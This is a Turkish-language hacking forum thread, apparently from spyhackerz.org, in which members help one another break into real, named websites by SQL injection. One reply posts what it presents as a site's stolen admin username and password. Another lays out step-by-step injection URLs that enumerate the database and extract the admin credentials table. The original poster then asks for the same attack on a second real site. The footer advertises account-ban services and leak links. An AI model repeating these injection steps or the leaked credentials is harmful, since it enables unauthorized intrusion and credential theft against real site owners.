sql injection ile ilgili

nedeyon

nedeyon

Katılım
25 Şub 2016
Tepki puanı
33
Rating - 0%
kusura bakmayın nereye açıcağımı bilemedim.sql ile ilgili sorum var.
http://www.bible-history.com/subcat.php?id=2
bu sitede ' koyuyorum hata veriyor fakat columları alamıyorum.order by 2-- yapıyorum Query failed : Unknown column '2' in 'order clause' hatası alıyorum order by 1-- yapınca site sayfası açılıyor bu 1 tane mi colum var demek anlamadım.union all select 1-- yapıyorum 1
Query failed1: The used SELECT statements have a different number of columns diyor yani column sayısı 1 değil yardıcmı olabilir misiniz?çok minnettar olurum.
 
T

TheWayEnd

Merhaba Havij Programını Kullan

Site Bilgileri Aşağıda Paneli Bul Gir. :)

Data Found: admin_id=1
Data Found: admin_username=jc
Data Found: admin_password=Mos3s
 
nedeyon

nedeyon

Katılım
25 Şub 2016
Tepki puanı
33
Rating - 0%
Son düzenleme:
T

TheWayEnd

Başka sitelere yönel Sql açığı öok olan bir açıktır.Ama Her açık Hacklencek diye bir şey yok
 
T

tarxes

Dostum, sitede 1 tane column var onun uzerinden gideceksin.
http://www.bible-history.com/subcat...schema.tables+where+table_schema=database()--

tablo isimlerini bu sekilde aldiktan sonra orda "administrators" isminde bir tabloyla karsilasacaksin. Bunu bir yere not et. Ardindan,

http://www.bible-history.com/subcat...chema.columns+where+table_schema=database()--

column isimlerini bu sekilde aldiktan sonra orda da gozune "admin_username,admin_password" kisimlari carpacaktir. Onlardanda veriyi su sekilde cekeceksin:
http://www.bible-history.com/subcat...2722f3e,admin_password)+from+administrators--
 
nedeyon

nedeyon

Katılım
25 Şub 2016
Tepki puanı
33
Rating - 0%
tarxes' Alıntı:
Dostum, sitede 1 tane column var onun uzerinden gideceksin.
http://www.bible-history.com/subcat...schema.tables+where+table_schema=database()--

tablo isimlerini bu sekilde aldiktan sonra orda "administrators" isminde bir tabloyla karsilasacaksin. Bunu bir yere not et. Ardindan,

http://www.bible-history.com/subcat...chema.columns+where+table_schema=database()--

column isimlerini bu sekilde aldiktan sonra orda da gozune "admin_username,admin_password" kisimlari carpacaktir. Onlardanda veriyi su sekilde cekeceksin:
http://www.bible-history.com/subcat...2722f3e,admin_password)+from+administrators--
Genişletmek için tıklayın ...
oo çok sağol benim çok ekmek yemem lazım
 
T

tarxes

Ayrica, havij degil sqlmap kullanirsan daha saglikli sonuclar alirsin :)
 
nedeyon

nedeyon

Katılım
25 Şub 2016
Tepki puanı
33
Rating - 0%
tarxes' Alıntı:
Dostum, sitede 1 tane column var onun uzerinden gideceksin.
http://www.bible-history.com/subcat...schema.tables+where+table_schema=database()--

tablo isimlerini bu sekilde aldiktan sonra orda "administrators" isminde bir tabloyla karsilasacaksin. Bunu bir yere not et. Ardindan,

http://www.bible-history.com/subcat...chema.columns+where+table_schema=database()--

column isimlerini bu sekilde aldiktan sonra orda da gozune "admin_username,admin_password" kisimlari carpacaktir. Onlardanda veriyi su sekilde cekeceksin:
http://www.bible-history.com/subcat...2722f3e,admin_password)+from+administrators--
Genişletmek için tıklayın ...
bu siteyide yapabilirmisin? http://www.hebron.com/english/gallery.php?id=170'
 
Yanıt için giriş yapmanız veya üye olmanız gerekir.
131,540Konular
3,269,080Mesajlar
315,369Kullanıcılar
hstqSon Üye

About Us & Legal Notice

Legal Notice: The website spyhackerz.org is classified as a “Hosting Provider” (“Yer Sağlayıcı”) within the meaning of Article 2, paragraph 1, subparagraph (m) and Article 5 of Law No. 5651. All content is created entirely by users without any prior approval, similar to platforms such as X, Instagram, Facebook, etc. As a hosting provider, spyhackerz.org is not obliged to monitor, control, or investigate user-generated content or any potentially unlawful sharing. There are no “attack teams” on spyhackerz.org, and no harmful activities are carried out against websites located in Türkiye. SPYHACKERZ is not responsible for any individual hacking-related forum activities carried out by its members. If any hacking activity is conducted against your websites using the name spyhackerz.org, all responsibility lies solely with the member who performs the attack.
Hızlı Erişim
+90 SMS Onay Aged instagram Aged instagram 2 instagram ban servisi Telegram ifşa Linkleri Canlı maç izleme linkleri telegram Sızma Testi Sosyal Medya Kripto Duyurular
Üst Alt